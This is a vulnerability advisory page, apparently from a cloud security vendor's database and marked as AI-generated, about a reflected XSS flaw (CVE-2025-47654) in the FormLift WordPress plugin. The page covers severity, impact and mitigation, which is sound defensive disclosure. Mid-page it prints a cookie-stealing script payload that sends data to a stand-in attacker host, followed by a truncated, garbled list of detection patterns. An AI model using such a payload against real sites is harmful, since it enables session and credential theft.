
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-47654 is a Reflected Cross-Site Scripting (XSS) vulnerability in the FormLift for Infusionsoft Web Forms WordPress plugin, developed by Adrian Tobey. The flaw affects all versions from n/a through 7.5.20 and was published on June 27, 2025, with the assigning authority being Patchstack. It carries a CVSS v3.1 base score of 7.1 (High) (Feedly, Patchstack).
The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting) and manifests as a Reflected XSS flaw, meaning malicious script is injected via a crafted URL or request parameter and immediately reflected back in the server's HTTP response without proper sanitization or encoding (Feedly). No authentication is required to craft the malicious request, but user interaction (e.g., a victim clicking a crafted link) is necessary for the payload to execute in the victim's browser. The attack vector is network-based with low attack complexity, and the scope is changed — meaning the impact extends beyond the vulnerable component itself (Feedly).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session on the affected WordPress site. This can lead to session token theft, credential harvesting, redirection to malicious sites, or defacement of page content as rendered to the victim. The CVSS scope change indicates that the impact can extend to other components or users beyond the directly vulnerable plugin, affecting confidentiality, integrity, and availability at a low level each (Feedly).
No public proof-of-concept exploit code or active in-the-wild exploitation has been reported for CVE-2025-47654 as of the available data. The EPSS score is approximately 0.00032, indicating a very low probability of exploitation in the near term (Feedly). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been identified.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>, URL-encoded as appropriate.%3Cscript%3E, onerror=, onload=) in query parameters.Site administrators should update the FormLift for Infusionsoft Web Forms plugin to a version beyond 7.5.20 as soon as a patched release is available from the plugin vendor (Patchstack). As an interim measure, consider disabling the plugin if it is not critical to site operations, or implement a Web Application Firewall (WAF) rule to block requests containing script injection patterns targeting FormLift endpoints. Ensure WordPress and all other plugins are kept up to date to reduce overall attack surface.
The vulnerability was noted in the Wordfence Intelligence Weekly WordPress Vulnerability Report for the week of June 16–22, 2025, and was included in the CISA Vulnerability Summary Bulletin for the week of June 23, 2025 (Wordfence, CISA Bulletin). No significant independent researcher commentary or social media discussion has been identified beyond standard vulnerability aggregation coverage.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."